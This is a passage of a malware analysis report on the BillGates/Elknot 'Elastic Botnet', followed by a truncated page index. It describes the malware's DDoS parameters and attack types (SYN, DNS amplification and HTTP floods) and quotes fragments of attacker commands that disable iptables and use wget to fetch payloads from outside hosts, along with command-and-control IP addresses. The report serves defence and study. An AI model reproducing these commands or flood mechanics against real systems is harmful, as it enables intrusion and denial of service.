NTRG_ElasticBotnetReport_06102015

Recommendations

Info

dns_domain X syn_flag X is_dns_random {1 or 0} dns_type X is_edns {1 or 0} edns_len X is_edns_sec {1 or 0} Believed to specify (as indicated by X) the domain name to target (for DNS attacks). The value is specified by the CSubTask that defines the attack. This is not a pktgen parameter but may be a feature of the xpacket.ko driver BillGates attempts to load into the kernel. Believed to specify the TCP flags value as indicated by X. The value is specified by the CSubTask that defines the attack. This is not a pktgen parameter but may be a feature of the xpacket.ko driver BillGates attempts to load into the kernel. Believed to specify if a random subdomain of the target domain name is to be generated in much the same way Elknot’s 0x83 attack performs. The value is specified by the CSubTask that defines the attack. This is not a pktgen parameter but may be a feature of the xpacket.ko driver BillGates attempts to load into the kernel. Believed to specify the type of DNS query to generate as indicated by X. The value is specified by the CSubTask that defines the attack. This is not a pktgen parameter but may be a feature of the xpacket.ko driver BillGates attempts to load into the kernel. The intent of this command is unknown. The value is specified by the CSubTask that defines the attack. This is not a pktgen parameter but may be a feature of the xpacket.ko driver BillGates attempts to load into the kernel. The intent of this command is unknown. The value is specified by the CSubTask that defines the attack. This is not a pktgen parameter but may be a feature of the xpacket.ko driver BillGates attempts to load into the kernel. The intent of this command is unknown. The value is specified by the CSubTask that defines the attack. This is not a pktgen parameter but may be a feature of the xpacket.ko driver BillGates attempts to load into the kernel. After configuring the parameters for pktgen (or its possible xpacket.ko replacement), CThreadKernelAtkExcutor::ProcessMain begins the attack by writing “start” to /proc/net/ pktgen/pgctrl. THE ELASTIC BOTNET REPORT 36
3.2.1 BILLGATE’S “NORMAL” DOS ATTACK MODE The complement to the kernel level DoS attack generator occurs within CThreadAtkCtrl::DoNormalSubTask. When a task requests a standard (or “normal”) sub-task, CThreadAtkCtrl::ProcessMain calls CThreadAtkCtrl::DoNormalSubTask which in turn calls CThreadAtkCtrl::StartNormalSubTask. For each sub-task, a new CThreadNormalAtkExcutor is generated and executed resulting in CThreadNormalAtkExcutor::ProcessMain being called. Based on the CSubTask.taskType field, CThreadNormalAtkExecutor::ProcessMain will generate a specific type of attack object (all of whom are derived from the CPacketAttack base class): CSubTask.taskType ATTACK OBJECT ATTACK TYPE 0x10 or 0x11 and field6 = 0 0x10 or 0x11 and field6 = 1 CAttackSyn CAttackCompress SYN Flood 0x20 CAttackUdp UDP Packet Flood Custom IP Header Flood. Sends TCP packets with an attacker-specified TCP header to the specified endpoint. This is potentially used for a Teardrop attack. 0x21, 0x23 or 0x24 CAttackDns Random DNS Subdomain Flood 0x22 CAttackAmp DNS Amplification Attack 0x25 CAttackPrx An unspecified form of DNS attack 0x30 CAttackIcmp PING Flood 0x40 CTcpAttack Arbitrary TCP Data. Sends an attackerspecified data stream to the a specified TCP endpoint. 0x41 CAttackCc HTTP Request Flood. Requests a series of URLs from a HTTP server. 0x42 CAttackIe Not currently implemented. Simply waits without sending any data. THE ELASTIC BOTNET REPORT 37
Page 1 and 2: THE ELASTIC BOTNET REPORT EXECUTIVE
Page 3 and 4: As a result of the above query, the
Page 5 and 6: Researchers Peter Kálnai and Jarom
Page 7 and 8: If the dropper is executed with 1 a
Page 9 and 10: The CStatBase class captures inform
Page 11 and 12: There are 2 types of messages curre
Page 13 and 14: struct Beacon { } unsigned int dwCP
Page 15 and 16: found, CThreadAttack::ProcessMain e
Page 17 and 18: The following diagram illustrates t
Page 19 and 20: 2.4.1.3 CSubTask.taskType = 0x82: P
Page 21 and 22: It is worth noting that, of all of
Page 23 and 24: The use of a raw network socket pro
Page 25 and 26: The contains a value between CSubT
Page 27 and 28: Structurally, the BillGates binary
Page 29 and 30: CSysTool::SelfInit uses the three s
Page 31 and 32: If the global variable g_bDoBackdoo
Page 33 and 34: Regardless of the communication mod
Page 35: COMMAND EXPLANATION count 0 Sets th
Page 39 and 40: • /bin/netstat • /bin/lsof •
Page 41 and 42: getty 15959 root 6u IPv4 1577210 0t
Page 43 and 44: 13 222.186.21.120 222.186.21.120:66
Page 45 and 46: 18 60.169.75.99 60.169.75.99:3113 w
Page 47 and 48: 219.235.4.22 219.235.4.22:7878 sos
Page 49 and 50: m * service iptables stop wget http
Page 51 and 52: wget -O /tmp/wocao http://198.13.96
Page 53 and 54: 4.1.10 INFRASTRUCTURE-TTP CLUSTER J
Page 55 and 56: 1.The bulk of the HFS instances hav
Page 57 and 58: With regards to the targeted port,
Page 59 and 60: While the Elknot malware does not h
Page 61: One common indicator of a BillGates

NTRG_ElasticBotnetReport_06102015

Create successful ePaper yourself

Delete template?

Save as template?